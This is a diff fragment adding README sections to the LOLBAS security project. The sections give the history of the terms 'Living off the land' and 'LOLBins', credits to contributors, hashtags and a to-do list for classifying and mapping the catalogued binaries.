+If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you.
+
+
+## STORY
+"Living off the land" was coined by Matt Graeber - @mattifestation <3    
+One of the first "Living Off The Land" talks (That I know of) is this one:
+https://www.youtube.com/watch?v=j-r6UonEkUw   
+
+The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
+https://twitter.com/MathCasualty/status/969174982579273728
+
+The term LOLScripts came from Jimmy - @bohops: 
+https://twitter.com/bohops/status/984828803120881665
+
+Common hashtags for these files are:
+
+#LOLBin   
+#LOLBins   
+#LOLScript   
+#LOLScripts   
+#LOLLib   
+#LOLLibs   
+
+A "highly scientific poll" was also conducted to agree (69% yes) on the name LOLBins.
+https://twitter.com/Oddvarmoe/status/985432848961343488 
+
+The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
+
+The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! 
+
+Love this logo:   
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOL1.png" height="250">
+
+## Future work / Todo list
+- [ ] Better classification system
+	- [ ] Load DLL
+	- [ ] Arbitrary unsigned code execution
+	- [ ] Launch other process
+- [ ] Better contribution template
+- [ ] Provide the project in DB format (sqlite)
+- [ ] Re-factor project (version 2.0) and move it to a dedicated project site (https://github.com/LOLBAS-Project)
+- [ ] Map it to the Mitre Att&ck <3
+- [ ] LOLGuiBins
+- [ ] More list based on classifications
+- [ ] LOLBAS lists for Linux? OSX?